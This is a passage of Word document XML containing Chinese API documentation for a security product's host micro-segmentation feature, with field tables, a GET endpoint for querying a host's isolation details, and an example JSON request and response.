            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18A62603" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIpBak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="390D11A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="456A7E2B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>根据</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>搜索的匹配</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6B97D634" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71ABD91A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68B4BB3F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78804304" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="134970E6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B017C81" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>groupName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43124531" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EF54AF5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="472A1973" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="037CDD82" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>onlineStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="684A6F4F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A9D148D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>在线状态，0：离线，1：在线</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="23CAE787" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="351F1B68" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ipList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="056B3B54" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DCFB11F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>放行</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6E839F2D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A20E3DC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>portList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AD24325" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F669C37" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>放行端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="35FBB199" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A7E8033" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7209124B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="610FCB6B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务状态：1隔离中 2隔离成功 3隔离失败 4修改中 5修改失败 6解除中 7解除失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0FC5E884" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13D8F960" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>operation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05E39399" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06A1FF25" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">操作类型， </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>micro_segmentation_add</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">:新增， </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>micro_segmentation_edit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>：修改 ，</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>micro_segmentation_del</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>：删除</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="20F15507" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3675BAAA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>error</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D86D3C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1876CF09" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>错误描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2FBE1F6D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6557AF54" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>direction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FEE15C9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BC6ABEB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>隔离方向,in:入站，out：出站，all：全部</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2BC87642" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="423" w:name="_Toc115166284"/>
      <w:bookmarkStart w:id="424" w:name="查询隔离详情"/>
      <w:bookmarkEnd w:id="422"/>
      <w:r>
        <w:t>查询隔离详情</w:t>
      </w:r>
      <w:bookmarkEnd w:id="423"/>
    </w:p>
    <w:p w14:paraId="446D9DC4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4A2F3C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ms-srv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/segmentation/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>detail</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0502F222"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954"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="841"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="4B1B048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D0FB3F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E777AEC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08B37D10" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68D193AB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5565054E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="668A719B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68354616" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5ECEA0B8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37F88DCF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机Id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F8969A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A6660F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/ms-srv/api/segmentation/detail?agentId=5fa27259dae9af8a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA6311B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B6A2C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "success": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorDesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "data": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "id": "61d7b2de27b7b26916736511",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "5fa27259dae9af8a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "513835545069574e666d",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ipList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "192.168.1.100",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "172.16.2.187"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>portList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "80",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "81",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "82"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "protocol": "*",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>updatedTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1641525982,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "remark": "123456",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "operation": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>micro_segmentation_add</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "status": 3,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "error": "主机离线",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "direction": "out"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568EF764"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484"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="7589"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="7B46D4F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5B5AE64" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65F014DB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="465D104B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="05E53A5E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="676467F5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11F5219C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04171DF7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否成功，true：成功，false：失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="41716E30" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45FCCD03" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>errorCode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E51D405" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="743F74D1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>状态码，0：成功，其他异常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="65D029BA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="379CEF72" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>errorDesc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A9AB13F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B8E86A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>异常描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="17236D89" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DDDB0D7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CD61401" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BCA336A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3E295E82" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="452DD658" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
